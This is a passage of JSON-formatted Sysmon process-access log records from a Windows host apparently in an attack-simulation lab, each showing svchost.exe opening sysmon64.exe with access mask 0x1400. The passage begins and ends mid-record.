05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 